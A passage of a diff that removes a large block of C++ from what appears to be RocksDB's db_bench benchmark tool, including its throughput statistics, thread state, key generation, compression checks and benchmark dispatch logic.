-      ReportFileOpCounters* counters = env->counters();
-      fprintf(stdout, "Num files opened: %d\n",
-              counters->open_counter_.load(std::memory_order_relaxed));
-      fprintf(stdout, "Num Read(): %d\n",
-              counters->read_counter_.load(std::memory_order_relaxed));
-      fprintf(stdout, "Num Append(): %d\n",
-              counters->append_counter_.load(std::memory_order_relaxed));
-      fprintf(stdout, "Num bytes read: %" PRIu64 "\n",
-              counters->bytes_read_.load(std::memory_order_relaxed));
-      fprintf(stdout, "Num bytes written: %" PRIu64 "\n",
-              counters->bytes_written_.load(std::memory_order_relaxed));
-      env->reset();
-    }
-    fflush(stdout);
-  }
-};
-
-class CombinedStats {
- public:
-  void AddStats(const Stats& stat) {
-    uint64_t total_ops = stat.done_;
-    uint64_t total_bytes_ = stat.bytes_;
-    double elapsed;
-
-    if (total_ops < 1) {
-      total_ops = 1;
-    }
-
-    elapsed = (stat.finish_ - stat.start_) * 1e-6;
-    throughput_ops_.emplace_back(total_ops / elapsed);
-
-    if (total_bytes_ > 0) {
-      double mbs = (total_bytes_ / 1048576.0);
-      throughput_mbs_.emplace_back(mbs / elapsed);
-    }
-  }
-
-  void Report(const std::string& bench_name) {
-    const char* name = bench_name.c_str();
-    int num_runs = static_cast<int>(throughput_ops_.size());
-
-    if (throughput_mbs_.size() == throughput_ops_.size()) {
-      fprintf(stdout,
-              "%s [AVG    %d runs] : %d ops/sec; %6.1f MB/sec\n"
-              "%s [MEDIAN %d runs] : %d ops/sec; %6.1f MB/sec\n",
-              name, num_runs, static_cast<int>(CalcAvg(throughput_ops_)),
-              CalcAvg(throughput_mbs_), name, num_runs,
-              static_cast<int>(CalcMedian(throughput_ops_)),
-              CalcMedian(throughput_mbs_));
-    } else {
-      fprintf(stdout,
-              "%s [AVG    %d runs] : %d ops/sec\n"
-              "%s [MEDIAN %d runs] : %d ops/sec\n",
-              name, num_runs, static_cast<int>(CalcAvg(throughput_ops_)), name,
-              num_runs, static_cast<int>(CalcMedian(throughput_ops_)));
-    }
-  }
-
- private:
-  double CalcAvg(std::vector<double> data) {
-    double avg = 0;
-    for (double x : data) {
-      avg += x;
-    }
-    avg = avg / data.size();
-    return avg;
-  }
-
-  double CalcMedian(std::vector<double> data) {
-    assert(data.size() > 0);
-    std::sort(data.begin(), data.end());
-
-    size_t mid = data.size() / 2;
-    if (data.size() % 2 == 1) {
-      // Odd number of entries
-      return data[mid];
-    } else {
-      // Even number of entries
-      return (data[mid] + data[mid - 1]) / 2;
-    }
-  }
-
-  std::vector<double> throughput_ops_;
-  std::vector<double> throughput_mbs_;
-};
-
-class TimestampEmulator {
- private:
-  std::atomic<uint64_t> timestamp_;
-
- public:
-  TimestampEmulator() : timestamp_(0) {}
-  uint64_t Get() const { return timestamp_.load(); }
-  void Inc() { timestamp_++; }
-};
-
-// State shared by all concurrent executions of the same benchmark.
-struct SharedState {
-  port::Mutex mu;
-  port::CondVar cv;
-  int total;
-  int perf_level;
-  std::shared_ptr<RateLimiter> write_rate_limiter;
-  std::shared_ptr<RateLimiter> read_rate_limiter;
-
-  // Each thread goes through the following states:
-  //    (1) initializing
-  //    (2) waiting for others to be initialized
-  //    (3) running
-  //    (4) done
-
-  long num_initialized;
-  long num_done;
-  bool start;
-
-  SharedState() : cv(&mu), perf_level(FLAGS_perf_level) { }
-};
-
-// Per-thread state for concurrent executions of the same benchmark.
-struct ThreadState {
-  int tid;             // 0..n-1 when running in n threads
-  Random64 rand;         // Has different seeds for different threads
-  Stats stats;
-  SharedState* shared;
-
-  /* implicit */ ThreadState(int index)
-      : tid(index),
-        rand((FLAGS_seed ? FLAGS_seed : 1000) + index) {
-  }
-};
-
-class Duration {
- public:
-  Duration(uint64_t max_seconds, int64_t max_ops, int64_t ops_per_stage = 0) {
-    max_seconds_ = max_seconds;
-    max_ops_= max_ops;
-    ops_per_stage_ = (ops_per_stage > 0) ? ops_per_stage : max_ops;
-    ops_ = 0;
-    start_at_ = FLAGS_env->NowMicros();
-  }
-
-  int64_t GetStage() { return std::min(ops_, max_ops_ - 1) / ops_per_stage_; }
-
-  bool Done(int64_t increment) {
-    if (increment <= 0) increment = 1;    // avoid Done(0) and infinite loops
-    ops_ += increment;
-
-    if (max_seconds_) {
-      // Recheck every appx 1000 ops (exact iff increment is factor of 1000)
-      auto granularity = FLAGS_ops_between_duration_checks;
-      if ((ops_ / granularity) != ((ops_ - increment) / granularity)) {
-        uint64_t now = FLAGS_env->NowMicros();
-        return ((now - start_at_) / 1000000) >= max_seconds_;
-      } else {
-        return false;
-      }
-    } else {
-      return ops_ > max_ops_;
-    }
-  }
-
- private:
-  uint64_t max_seconds_;
-  int64_t max_ops_;
-  int64_t ops_per_stage_;
-  int64_t ops_;
-  uint64_t start_at_;
-};
-
-class Benchmark {
- private:
-  std::shared_ptr<Cache> cache_;
-  std::shared_ptr<Cache> compressed_cache_;
-  std::shared_ptr<const FilterPolicy> filter_policy_;
-  const SliceTransform* prefix_extractor_;
-  DBWithColumnFamilies db_;
-  std::vector<DBWithColumnFamilies> multi_dbs_;
-  int64_t num_;
-  int value_size_;
-  int key_size_;
-  int prefix_size_;
-  int64_t keys_per_prefix_;
-  int64_t entries_per_batch_;
-  int64_t writes_per_range_tombstone_;
-  int64_t range_tombstone_width_;
-  int64_t max_num_range_tombstones_;
-  WriteOptions write_options_;
-  Options open_options_;  // keep options around to properly destroy db later
-  int64_t reads_;
-  int64_t deletes_;
-  double read_random_exp_range_;
-  int64_t writes_;
-  int64_t readwrites_;
-  int64_t merge_keys_;
-  bool report_file_operations_;
-  bool use_blob_db_;
-
-  bool SanityCheck() {
-    if (FLAGS_compression_ratio > 1) {
-      fprintf(stderr, "compression_ratio should be between 0 and 1\n");
-      return false;
-    }
-    return true;
-  }
-
-  inline bool CompressSlice(const Slice& input, std::string* compressed) {
-    bool ok = true;
-    switch (FLAGS_compression_type_e) {
-      case rocksdb::kSnappyCompression:
-        ok = Snappy_Compress(Options().compression_opts, input.data(),
-                             input.size(), compressed);
-        break;
-      case rocksdb::kZlibCompression:
-        ok = Zlib_Compress(Options().compression_opts, 2, input.data(),
-                           input.size(), compressed);
-        break;
-      case rocksdb::kBZip2Compression:
-        ok = BZip2_Compress(Options().compression_opts, 2, input.data(),
-                            input.size(), compressed);
-        break;
-      case rocksdb::kLZ4Compression:
-        ok = LZ4_Compress(Options().compression_opts, 2, input.data(),
-                          input.size(), compressed);
-        break;
-      case rocksdb::kLZ4HCCompression:
-        ok = LZ4HC_Compress(Options().compression_opts, 2, input.data(),
-                            input.size(), compressed);
-        break;
-      case rocksdb::kXpressCompression:
-        ok = XPRESS_Compress(input.data(),
-          input.size(), compressed);
-        break;
-      case rocksdb::kZSTD:
-        ok = ZSTD_Compress(Options().compression_opts, input.data(),
-                           input.size(), compressed);
-        break;
-      default:
-        ok = false;
-    }
-    return ok;
-  }
-
-  void PrintHeader() {
-    PrintEnvironment();
-    fprintf(stdout, "Keys:       %d bytes each\n", FLAGS_key_size);
-    fprintf(stdout, "Values:     %d bytes each (%d bytes after compression)\n",
-            FLAGS_value_size,
-            static_cast<int>(FLAGS_value_size * FLAGS_compression_ratio + 0.5));
-    fprintf(stdout, "Entries:    %" PRIu64 "\n", num_);
-    fprintf(stdout, "Prefix:    %d bytes\n", FLAGS_prefix_size);
-    fprintf(stdout, "Keys per prefix:    %" PRIu64 "\n", keys_per_prefix_);
-    fprintf(stdout, "RawSize:    %.1f MB (estimated)\n",
-            ((static_cast<int64_t>(FLAGS_key_size + FLAGS_value_size) * num_)
-             / 1048576.0));
-    fprintf(stdout, "FileSize:   %.1f MB (estimated)\n",
-            (((FLAGS_key_size + FLAGS_value_size * FLAGS_compression_ratio)
-              * num_)
-             / 1048576.0));
-    fprintf(stdout, "Write rate: %" PRIu64 " bytes/second\n",
-            FLAGS_benchmark_write_rate_limit);
-    fprintf(stdout, "Read rate: %" PRIu64 " ops/second\n",
-            FLAGS_benchmark_read_rate_limit);
-    if (FLAGS_enable_numa) {
-      fprintf(stderr, "Running in NUMA enabled mode.\n");
-#ifndef NUMA
-      fprintf(stderr, "NUMA is not defined in the system.\n");
-      exit(1);
-#else
-      if (numa_available() == -1) {
-        fprintf(stderr, "NUMA is not supported by the system.\n");
-        exit(1);
-      }
-#endif
-    }
-
-    auto compression = CompressionTypeToString(FLAGS_compression_type_e);
-    fprintf(stdout, "Compression: %s\n", compression.c_str());
-
-    switch (FLAGS_rep_factory) {
-      case kPrefixHash:
-        fprintf(stdout, "Memtablerep: prefix_hash\n");
-        break;
-      case kSkipList:
-        fprintf(stdout, "Memtablerep: skip_list\n");
-        break;
-      case kVectorRep:
-        fprintf(stdout, "Memtablerep: vector\n");
-        break;
-      case kHashLinkedList:
-        fprintf(stdout, "Memtablerep: hash_linkedlist\n");
-        break;
-      case kCuckoo:
-        fprintf(stdout, "Memtablerep: cuckoo\n");
-        break;
-    }
-    fprintf(stdout, "Perf Level: %d\n", FLAGS_perf_level);
-
-    PrintWarnings(compression.c_str());
-    fprintf(stdout, "------------------------------------------------\n");
-  }
-
-  void PrintWarnings(const char* compression) {
-#if defined(__GNUC__) && !defined(__OPTIMIZE__)
-    fprintf(stdout,
-            "WARNING: Optimization is disabled: benchmarks unnecessarily slow\n"
-            );
-#endif
-#ifndef NDEBUG
-    fprintf(stdout,
-            "WARNING: Assertions are enabled; benchmarks unnecessarily slow\n");
-#endif
-    if (FLAGS_compression_type_e != rocksdb::kNoCompression) {
-      // The test string should not be too small.
-      const int len = FLAGS_block_size;
-      std::string input_str(len, 'y');
-      std::string compressed;
-      bool result = CompressSlice(Slice(input_str), &compressed);
-
-      if (!result) {
-        fprintf(stdout, "WARNING: %s compression is not enabled\n",
-                compression);
-      } else if (compressed.size() >= input_str.size()) {
-        fprintf(stdout, "WARNING: %s compression is not effective\n",
-                compression);
-      }
-    }
-  }
-
-// Current the following isn't equivalent to OS_LINUX.
-#if defined(__linux)
-  static Slice TrimSpace(Slice s) {
-    unsigned int start = 0;
-    while (start < s.size() && isspace(s[start])) {
-      start++;
-    }
-    unsigned int limit = static_cast<unsigned int>(s.size());
-    while (limit > start && isspace(s[limit-1])) {
-      limit--;
-    }
-    return Slice(s.data() + start, limit - start);
-  }
-#endif
-
-  void PrintEnvironment() {
-    fprintf(stderr, "RocksDB:    version %d.%d\n",
-            kMajorVersion, kMinorVersion);
-
-#if defined(__linux)
-    time_t now = time(nullptr);
-    char buf[52];
-    // Lint complains about ctime() usage, so replace it with ctime_r(). The
-    // requirement is to provide a buffer which is at least 26 bytes.
-    fprintf(stderr, "Date:       %s",
-            ctime_r(&now, buf));  // ctime_r() adds newline
-
-    FILE* cpuinfo = fopen("/proc/cpuinfo", "r");
-    if (cpuinfo != nullptr) {
-      char line[1000];
-      int num_cpus = 0;
-      std::string cpu_type;
-      std::string cache_size;
-      while (fgets(line, sizeof(line), cpuinfo) != nullptr) {
-        const char* sep = strchr(line, ':');
-        if (sep == nullptr) {
-          continue;
-        }
-        Slice key = TrimSpace(Slice(line, sep - 1 - line));
-        Slice val = TrimSpace(Slice(sep + 1));
-        if (key == "model name") {
-          ++num_cpus;
-          cpu_type = val.ToString();
-        } else if (key == "cache size") {
-          cache_size = val.ToString();
-        }
-      }
-      fclose(cpuinfo);
-      fprintf(stderr, "CPU:        %d * %s\n", num_cpus, cpu_type.c_str());
-      fprintf(stderr, "CPUCache:   %s\n", cache_size.c_str());
-    }
-#endif
-  }
-
-  static bool KeyExpired(const TimestampEmulator* timestamp_emulator,
-                         const Slice& key) {
-    const char* pos = key.data();
-    pos += 8;
-    uint64_t timestamp = 0;
-    if (port::kLittleEndian) {
-      int bytes_to_fill = 8;
-      for (int i = 0; i < bytes_to_fill; ++i) {
-        timestamp |= (static_cast<uint64_t>(static_cast<unsigned char>(pos[i]))
-                      << ((bytes_to_fill - i - 1) << 3));
-      }
-    } else {
-      memcpy(&timestamp, pos, sizeof(timestamp));
-    }
-    return timestamp_emulator->Get() - timestamp > FLAGS_time_range;
-  }
-
-  class ExpiredTimeFilter : public CompactionFilter {
-   public:
-    explicit ExpiredTimeFilter(
-        const std::shared_ptr<TimestampEmulator>& timestamp_emulator)
-        : timestamp_emulator_(timestamp_emulator) {}
-    bool Filter(int level, const Slice& key, const Slice& existing_value,
-                std::string* new_value, bool* value_changed) const override {
-      return KeyExpired(timestamp_emulator_.get(), key);
-    }
-    const char* Name() const override { return "ExpiredTimeFilter"; }
-
-   private:
-    std::shared_ptr<TimestampEmulator> timestamp_emulator_;
-  };
-
-  std::shared_ptr<Cache> NewCache(int64_t capacity) {
-    if (capacity <= 0) {
-      return nullptr;
-    }
-    if (FLAGS_use_clock_cache) {
-      auto cache = NewClockCache((size_t)capacity, FLAGS_cache_numshardbits);
-      if (!cache) {
-        fprintf(stderr, "Clock cache not supported.");
-        exit(1);
-      }
-      return cache;
-    } else {
-      return NewLRUCache((size_t)capacity, FLAGS_cache_numshardbits,
-                         false /*strict_capacity_limit*/,
-                         FLAGS_cache_high_pri_pool_ratio);
-    }
-  }
-
- public:
-  Benchmark()
-      : cache_(NewCache(FLAGS_cache_size)),
-        compressed_cache_(NewCache(FLAGS_compressed_cache_size)),
-        filter_policy_(FLAGS_bloom_bits >= 0
-                           ? NewBloomFilterPolicy(FLAGS_bloom_bits,
-                                                  FLAGS_use_block_based_filter)
-                           : nullptr),
-        prefix_extractor_(NewFixedPrefixTransform(FLAGS_prefix_size)),
-        num_(FLAGS_num),
-        value_size_(FLAGS_value_size),
-        key_size_(FLAGS_key_size),
-        prefix_size_(FLAGS_prefix_size),
-        keys_per_prefix_(FLAGS_keys_per_prefix),
-        entries_per_batch_(1),
-        reads_(FLAGS_reads < 0 ? FLAGS_num : FLAGS_reads),
-        read_random_exp_range_(0.0),
-        writes_(FLAGS_writes < 0 ? FLAGS_num : FLAGS_writes),
-        readwrites_(
-            (FLAGS_writes < 0 && FLAGS_reads < 0)
-                ? FLAGS_num
-                : ((FLAGS_writes > FLAGS_reads) ? FLAGS_writes : FLAGS_reads)),
-        merge_keys_(FLAGS_merge_keys < 0 ? FLAGS_num : FLAGS_merge_keys),
-        report_file_operations_(FLAGS_report_file_operations),
-#ifndef ROCKSDB_LITE
-        use_blob_db_(FLAGS_use_blob_db) {
-#else
-        use_blob_db_(false) {
-#endif  // !ROCKSDB_LITE
-    // use simcache instead of cache
-    if (FLAGS_simcache_size >= 0) {
-      if (FLAGS_cache_numshardbits >= 1) {
-        cache_ =
-            NewSimCache(cache_, FLAGS_simcache_size, FLAGS_cache_numshardbits);
-      } else {
-        cache_ = NewSimCache(cache_, FLAGS_simcache_size, 0);
-      }
-    }
-
-    if (report_file_operations_) {
-      if (!FLAGS_hdfs.empty()) {
-        fprintf(stderr,
-                "--hdfs and --report_file_operations cannot be enabled "
-                "at the same time");
-        exit(1);
-      }
-      FLAGS_env = new ReportFileOpEnv(rocksdb::Env::Default());
-    }
-
-    if (FLAGS_prefix_size > FLAGS_key_size) {
-      fprintf(stderr, "prefix size is larger than key size");
-      exit(1);
-    }
-
-    std::vector<std::string> files;
-    FLAGS_env->GetChildren(FLAGS_db, &files);
-    for (size_t i = 0; i < files.size(); i++) {
-      if (Slice(files[i]).starts_with("heap-")) {
-        FLAGS_env->DeleteFile(FLAGS_db + "/" + files[i]);
-      }
-    }
-    if (!FLAGS_use_existing_db) {
-      Options options;
-      if (!FLAGS_wal_dir.empty()) {
-        options.wal_dir = FLAGS_wal_dir;
-      }
-#ifndef ROCKSDB_LITE
-      if (use_blob_db_) {
-        blob_db::DestroyBlobDB(FLAGS_db, options, blob_db::BlobDBOptions());
-      }
-#endif  // !ROCKSDB_LITE
-      DestroyDB(FLAGS_db, options);
-      if (!FLAGS_wal_dir.empty()) {
-        FLAGS_env->DeleteDir(FLAGS_wal_dir);
-      }
-
-      if (FLAGS_num_multi_db > 1) {
-        FLAGS_env->CreateDir(FLAGS_db);
-        if (!FLAGS_wal_dir.empty()) {
-          FLAGS_env->CreateDir(FLAGS_wal_dir);
-        }
-      }
-    }
-  }
-
-  ~Benchmark() {
-    db_.DeleteDBs();
-    delete prefix_extractor_;
-    if (cache_.get() != nullptr) {
-      // this will leak, but we're shutting down so nobody cares
-      cache_->DisownData();
-    }
-  }
-
-  Slice AllocateKey(std::unique_ptr<const char[]>* key_guard) {
-    char* data = new char[key_size_];
-    const char* const_data = data;
-    key_guard->reset(const_data);
-    return Slice(key_guard->get(), key_size_);
-  }
-
-  // Generate key according to the given specification and random number.
-  // The resulting key will have the following format (if keys_per_prefix_
-  // is positive), extra trailing bytes are either cut off or padded with '0'.
-  // The prefix value is derived from key value.
-  //   ----------------------------
-  //   | prefix 00000 | key 00000 |
-  //   ----------------------------
-  // If keys_per_prefix_ is 0, the key is simply a binary representation of
-  // random number followed by trailing '0's
-  //   ----------------------------
-  //   |        key 00000         |
-  //   ----------------------------
-  void GenerateKeyFromInt(uint64_t v, int64_t num_keys, Slice* key) {
-    char* start = const_cast<char*>(key->data());
-    char* pos = start;
-    if (keys_per_prefix_ > 0) {
-      int64_t num_prefix = num_keys / keys_per_prefix_;
-      int64_t prefix = v % num_prefix;
-      int bytes_to_fill = std::min(prefix_size_, 8);
-      if (port::kLittleEndian) {
-        for (int i = 0; i < bytes_to_fill; ++i) {
-          pos[i] = (prefix >> ((bytes_to_fill - i - 1) << 3)) & 0xFF;
-        }
-      } else {
-        memcpy(pos, static_cast<void*>(&prefix), bytes_to_fill);
-      }
-      if (prefix_size_ > 8) {
-        // fill the rest with 0s
-        memset(pos + 8, '0', prefix_size_ - 8);
-      }
-      pos += prefix_size_;
-    }
-
-    int bytes_to_fill = std::min(key_size_ - static_cast<int>(pos - start), 8);
-    if (port::kLittleEndian) {
-      for (int i = 0; i < bytes_to_fill; ++i) {
-        pos[i] = (v >> ((bytes_to_fill - i - 1) << 3)) & 0xFF;
-      }
-    } else {
-      memcpy(pos, static_cast<void*>(&v), bytes_to_fill);
-    }
-    pos += bytes_to_fill;
-    if (key_size_ > pos - start) {
-      memset(pos, '0', key_size_ - (pos - start));
-    }
-  }
-
-  std::string GetPathForMultiple(std::string base_name, size_t id) {
-    if (!base_name.empty()) {
-#ifndef OS_WIN
-      if (base_name.back() != '/') {
-        base_name += '/';
-      }
-#else
-      if (base_name.back() != '\\') {
-        base_name += '\\';
-      }
-#endif
-    }
-    return base_name + ToString(id);
-  }
-
-void VerifyDBFromDB(std::string& truth_db_name) {
-  DBWithColumnFamilies truth_db;
-  auto s = DB::OpenForReadOnly(open_options_, truth_db_name, &truth_db.db);
-  if (!s.ok()) {
-    fprintf(stderr, "open error: %s\n", s.ToString().c_str());
-    exit(1);
-  }
-  ReadOptions ro;
-  ro.total_order_seek = true;
-  std::unique_ptr<Iterator> truth_iter(truth_db.db->NewIterator(ro));
-  std::unique_ptr<Iterator> db_iter(db_.db->NewIterator(ro));
-  // Verify that all the key/values in truth_db are retrivable in db with ::Get
-  fprintf(stderr, "Verifying db >= truth_db with ::Get...\n");
-  for (truth_iter->SeekToFirst(); truth_iter->Valid(); truth_iter->Next()) {
-      std::string value;
-      s = db_.db->Get(ro, truth_iter->key(), &value);
-      assert(s.ok());
-      // TODO(myabandeh): provide debugging hints
-      assert(Slice(value) == truth_iter->value());
-  }
-  // Verify that the db iterator does not give any extra key/value
-  fprintf(stderr, "Verifying db == truth_db...\n");
-  for (db_iter->SeekToFirst(), truth_iter->SeekToFirst(); db_iter->Valid(); db_iter->Next(), truth_iter->Next()) {
-    assert(truth_iter->Valid());
-    assert(truth_iter->value() == db_iter->value());
-  }
-  // No more key should be left unchecked in truth_db
-  assert(!truth_iter->Valid());
-  fprintf(stderr, "...Verified\n");
-}
-
-  void Run() {
-    if (!SanityCheck()) {
-      exit(1);
-    }
-    Open(&open_options_);
-    PrintHeader();
-    std::stringstream benchmark_stream(FLAGS_benchmarks);
-    std::string name;
-    std::unique_ptr<ExpiredTimeFilter> filter;
-    while (std::getline(benchmark_stream, name, ',')) {
-      // Sanitize parameters
-      num_ = FLAGS_num;
-      reads_ = (FLAGS_reads < 0 ? FLAGS_num : FLAGS_reads);
-      writes_ = (FLAGS_writes < 0 ? FLAGS_num : FLAGS_writes);
-      deletes_ = (FLAGS_deletes < 0 ? FLAGS_num : FLAGS_deletes);
-      value_size_ = FLAGS_value_size;
-      key_size_ = FLAGS_key_size;
-      entries_per_batch_ = FLAGS_batch_size;
-      writes_per_range_tombstone_ = FLAGS_writes_per_range_tombstone;
-      range_tombstone_width_ = FLAGS_range_tombstone_width;
-      max_num_range_tombstones_ = FLAGS_max_num_range_tombstones;
-      write_options_ = WriteOptions();
-      read_random_exp_range_ = FLAGS_read_random_exp_range;
-      if (FLAGS_sync) {
-        write_options_.sync = true;
-      }
-      write_options_.disableWAL = FLAGS_disable_wal;
-
-      void (Benchmark::*method)(ThreadState*) = nullptr;
-      void (Benchmark::*post_process_method)() = nullptr;
-
-      bool fresh_db = false;
-      int num_threads = FLAGS_threads;
-
-      int num_repeat = 1;
-      int num_warmup = 0;
-      if (!name.empty() && *name.rbegin() == ']') {
-        auto it = name.find('[');
-        if (it == std::string::npos) {
-          fprintf(stderr, "unknown benchmark arguments '%s'\n", name.c_str());
-          exit(1);
-        }
-        std::string args = name.substr(it + 1);
-        args.resize(args.size() - 1);
-        name.resize(it);
-
-        std::string bench_arg;
-        std::stringstream args_stream(args);
-        while (std::getline(args_stream, bench_arg, '-')) {
-          if (bench_arg.empty()) {
-            continue;
-          }
-          if (bench_arg[0] == 'X') {
-            // Repeat the benchmark n times
-            std::string num_str = bench_arg.substr(1);
-            num_repeat = std::stoi(num_str);
-          } else if (bench_arg[0] == 'W') {
-            // Warm up the benchmark for n times
-            std::string num_str = bench_arg.substr(1);
-            num_warmup = std::stoi(num_str);
-          }
-        }
-      }
-
-      // Both fillseqdeterministic and filluniquerandomdeterministic
-      // fill the levels except the max level with UNIQUE_RANDOM
-      // and fill the max level with fillseq and filluniquerandom, respectively
-      if (name == "fillseqdeterministic" ||
-          name == "filluniquerandomdeterministic") {
-        if (!FLAGS_disable_auto_compactions) {
-          fprintf(stderr,
-                  "Please disable_auto_compactions in FillDeterministic "
-                  "benchmark\n");
-          exit(1);
-        }
-        if (num_threads > 1) {
-          fprintf(stderr,
-                  "filldeterministic multithreaded not supported"
-                  ", use 1 thread\n");
-          num_threads = 1;
-        }
-        fresh_db = true;
-        if (name == "fillseqdeterministic") {
-          method = &Benchmark::WriteSeqDeterministic;
-        } else {
-          method = &Benchmark::WriteUniqueRandomDeterministic;
-        }
-      } else if (name == "fillseq") {
-        fresh_db = true;
-        method = &Benchmark::WriteSeq;
-      } else if (name == "fillbatch") {
-        fresh_db = true;
-        entries_per_batch_ = 1000;
-        method = &Benchmark::WriteSeq;
-      } else if (name == "fillrandom") {
-        fresh_db = true;
-        method = &Benchmark::WriteRandom;
-      } else if (name == "filluniquerandom") {
-        fresh_db = true;
-        if (num_threads > 1) {
-          fprintf(stderr,
-                  "filluniquerandom multithreaded not supported"
-                  ", use 1 thread");
-          num_threads = 1;
-        }
-        method = &Benchmark::WriteUniqueRandom;
-      } else if (name == "overwrite") {
-        method = &Benchmark::WriteRandom;
-      } else if (name == "fillsync") {
-        fresh_db = true;
-        num_ /= 1000;
-        write_options_.sync = true;
-        method = &Benchmark::WriteRandom;
-      } else if (name == "fill100K") {
-        fresh_db = true;
-        num_ /= 1000;
-        value_size_ = 100 * 1000;
-        method = &Benchmark::WriteRandom;
-      } else if (name == "readseq") {
-        method = &Benchmark::ReadSequential;
-      } else if (name == "readtocache") {
-        method = &Benchmark::ReadSequential;
-        num_threads = 1;
-        reads_ = num_;
-      } else if (name == "readreverse") {
-        method = &Benchmark::ReadReverse;
-      } else if (name == "readrandom") {
-        method = &Benchmark::ReadRandom;
-      } else if (name == "readrandomfast") {
-        method = &Benchmark::ReadRandomFast;
-      } else if (name == "multireadrandom") {
-        fprintf(stderr, "entries_per_batch = %" PRIi64 "\n",
-                entries_per_batch_);
-        method = &Benchmark::MultiReadRandom;
-      } else if (name == "readmissing") {
-        ++key_size_;
-        method = &Benchmark::ReadRandom;
-      } else if (name == "newiterator") {
-        method = &Benchmark::IteratorCreation;
-      } else if (name == "newiteratorwhilewriting") {
-        num_threads++;  // Add extra thread for writing
-        method = &Benchmark::IteratorCreationWhileWriting;
-      } else if (name == "seekrandom") {
-        method = &Benchmark::SeekRandom;
-      } else if (name == "seekrandomwhilewriting") {
-        num_threads++;  // Add extra thread for writing
-        method = &Benchmark::SeekRandomWhileWriting;
-      } else if (name == "seekrandomwhilemerging") {
-        num_threads++;  // Add extra thread for merging
-        method = &Benchmark::SeekRandomWhileMerging;
-      } else if (name == "readrandomsmall") {
-        reads_ /= 1000;
-        method = &Benchmark::ReadRandom;
-      } else if (name == "deleteseq") {
-        method = &Benchmark::DeleteSeq;
-      } else if (name == "deleterandom") {
-        method = &Benchmark::DeleteRandom;
-      } else if (name == "readwhilewriting") {
-        num_threads++;  // Add extra thread for writing
-        method = &Benchmark::ReadWhileWriting;
-      } else if (name == "readwhilemerging") {
-        num_threads++;  // Add extra thread for writing
-        method = &Benchmark::ReadWhileMerging;
-      } else if (name == "readrandomwriterandom") {
-        method = &Benchmark::ReadRandomWriteRandom;
-      } else if (name == "readrandommergerandom") {
-        if (FLAGS_merge_operator.empty()) {
-          fprintf(stdout, "%-12s : skipped (--merge_operator is unknown)\n",
-                  name.c_str());
-          exit(1);
-        }
-        method = &Benchmark::ReadRandomMergeRandom;
-      } else if (name == "updaterandom") {
-        method = &Benchmark::UpdateRandom;
-      } else if (name == "appendrandom") {
-        method = &Benchmark::AppendRandom;
-      } else if (name == "mergerandom") {
-        if (FLAGS_merge_operator.empty()) {
-          fprintf(stdout, "%-12s : skipped (--merge_operator is unknown)\n",
-                  name.c_str());
-          exit(1);
-        }
-        method = &Benchmark::MergeRandom;
-      } else if (name == "randomwithverify") {
-        method = &Benchmark::RandomWithVerify;
-      } else if (name == "fillseekseq") {
-        method = &Benchmark::WriteSeqSeekSeq;
-      } else if (name == "compact") {
-        method = &Benchmark::Compact;
-      } else if (name == "compactall") {
-        CompactAll();
-      } else if (name == "crc32c") {
-        method = &Benchmark::Crc32c;
-      } else if (name == "xxhash") {
-        method = &Benchmark::xxHash;
-      } else if (name == "acquireload") {
-        method = &Benchmark::AcquireLoad;
-      } else if (name == "compress") {
-        method = &Benchmark::Compress;
-      } else if (name == "uncompress") {
-        method = &Benchmark::Uncompress;
-#ifndef ROCKSDB_LITE
-      } else if (name == "randomtransaction") {
-        method = &Benchmark::RandomTransaction;
-        post_process_method = &Benchmark::RandomTransactionVerify;
-#endif  // ROCKSDB_LITE
-      } else if (name == "randomreplacekeys") {
-        fresh_db = true;
-        method = &Benchmark::RandomReplaceKeys;
-      } else if (name == "timeseries") {
-        timestamp_emulator_.reset(new TimestampEmulator());
-        if (FLAGS_expire_style == "compaction_filter") {
-          filter.reset(new ExpiredTimeFilter(timestamp_emulator_));
-          fprintf(stdout, "Compaction filter is used to remove expired data");
-          open_options_.compaction_filter = filter.get();
-        }
-        fresh_db = true;
-        method = &Benchmark::TimeSeries;
-      } else if (name == "stats") {
-        PrintStats("rocksdb.stats");
-      } else if (name == "resetstats") {
-        ResetStats();
-      } else if (name == "verify") {
-        VerifyDBFromDB(FLAGS_truth_db);
-      } else if (name == "levelstats") {
-        PrintStats("rocksdb.levelstats");
-      } else if (name == "sstables") {
-        PrintStats("rocksdb.sstables");
-      } else if (!name.empty()) {  // No error message for empty name
-        fprintf(stderr, "unknown benchmark '%s'\n", name.c_str());
-        exit(1);
-      }
-
-      if (fresh_db) {
-        if (FLAGS_use_existing_db) {
-          fprintf(stdout, "%-12s : skipped (--use_existing_db is true)\n",
-                  name.c_str());
-          method = nullptr;
-        } else {
-          if (db_.db != nullptr) {
-            db_.DeleteDBs();
-            DestroyDB(FLAGS_db, open_options_);
-          }
-          Options options = open_options_;
-          for (size_t i = 0; i < multi_dbs_.size(); i++) {
-            delete multi_dbs_[i].db;
-            if (!open_options_.wal_dir.empty()) {
-              options.wal_dir = GetPathForMultiple(open_options_.wal_dir, i);
-            }
-            DestroyDB(GetPathForMultiple(FLAGS_db, i), options);
-          }
-          multi_dbs_.clear();
-        }
-        Open(&open_options_);  // use open_options for the last accessed
-      }
-
-      if (method != nullptr) {
-        fprintf(stdout, "DB path: [%s]\n", FLAGS_db.c_str());
-        if (num_warmup > 0) {
-          printf("Warming up benchmark by running %d times\n", num_warmup);
-        }
-
-        for (int i = 0; i < num_warmup; i++) {
-          RunBenchmark(num_threads, name, method);
-        }
-
-        if (num_repeat > 1) {
-          printf("Running benchmark for %d times\n", num_repeat);
-        }
-
-        CombinedStats combined_stats;
-        for (int i = 0; i < num_repeat; i++) {
-          Stats stats = RunBenchmark(num_threads, name, method);
-          combined_stats.AddStats(stats);
-        }
-        if (num_repeat > 1) {
-          combined_stats.Report(name);
-        }
-      }
-      if (post_process_method != nullptr) {
-        (this->*post_process_method)();
-      }
-    }
-    if (FLAGS_statistics) {
-      fprintf(stdout, "STATISTICS:\n%s\n", dbstats->ToString().c_str());
-    }
-    if (FLAGS_simcache_size >= 0) {
-      fprintf(stdout, "SIMULATOR CACHE STATISTICS:\n%s\n",
-              static_cast_with_check<SimCache, Cache>(cache_.get())
-                  ->ToString()
-                  .c_str());
-    }
-  }
-
- private:
-  std::shared_ptr<TimestampEmulator> timestamp_emulator_;
-
-  struct ThreadArg {
-    Benchmark* bm;
-    SharedState* shared;
-    ThreadState* thread;
-    void (Benchmark::*method)(ThreadState*);
-  };
-
-  static void ThreadBody(void* v) {
-    ThreadArg* arg = reinterpret_cast<ThreadArg*>(v);
-    SharedState* shared = arg->shared;
-    ThreadState* thread = arg->thread;
-    {
